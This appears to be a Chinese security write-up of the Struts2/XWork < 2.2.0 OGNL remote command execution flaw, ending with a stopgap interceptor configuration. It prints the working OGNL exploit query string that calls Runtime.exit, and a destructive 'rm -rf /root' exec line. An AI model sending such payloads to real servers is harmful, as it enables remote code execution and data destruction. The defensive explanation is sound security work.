Struts：exploit-db 网站在7月14日爆出了一个 Struts2 的远程执行任意代码的漏洞。
漏洞名称：Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
相关介绍:
http://www.exploit-db.com/exploits/14360/
http://sebug.net/exploit/19954/
?user.address.city=Bishkek&user['favoriteDrink']=kumys
?user.address.city=Bishkek&user['favoriteDrink']=kumys
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
action.getUser().getAddress().setCity("Bishkek") action.getUser().setFavoriteDrink("kumys")
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
java.lang.Runtime.getRuntime().exit(1);
java.lang.Runtime.getRuntime().exit(1);
java.lang.Runtime.getRuntime().exec("rm -rf /root")
java.lang.Runtime.getRuntime().exec("rm -rf /root")，只要运行应用的进程有相应权限，就可以删除任何一个目录。
<s:bean id="UserUtil" name="cn.com.my_corner.util.UserUtil"></s:bean>
<s:property value="#UserUtil.getType().get(cType.toString())"/>
<s:bean id="UserUtil" name="cn.com.my_corner.util.UserUtil"></s:bean> <s:property value="#UserUtil.getType().get(cType.toString())" />
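<!-- Stopgap for the Struts2/XWork < 2.2.0 issue described above: the params
     interceptor skips any request parameter whose name contains the literal
     text \u0023 (the Unicode escape for '#'), so it is not evaluated as an
     OGNL expression.
     NOTE(review): a blacklist on one spelling of '#' is fragile; moving to a
     release outside the affected range is the durable fix.
     NOTE(review): setting excludeParams here replaces any pattern the
     interceptor stack already defines. Merge existing patterns into this
     value (comma-separated) rather than dropping them. -->
<interceptor-ref name="params">
    <param name="excludeParams">.*\\u0023.*</param>
</interceptor-ref>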
<interceptor-ref name="params"> <param name="excludeParams">.*\\u0023.*</param> </interceptor-ref>
http://www.iteye.com/topic/720209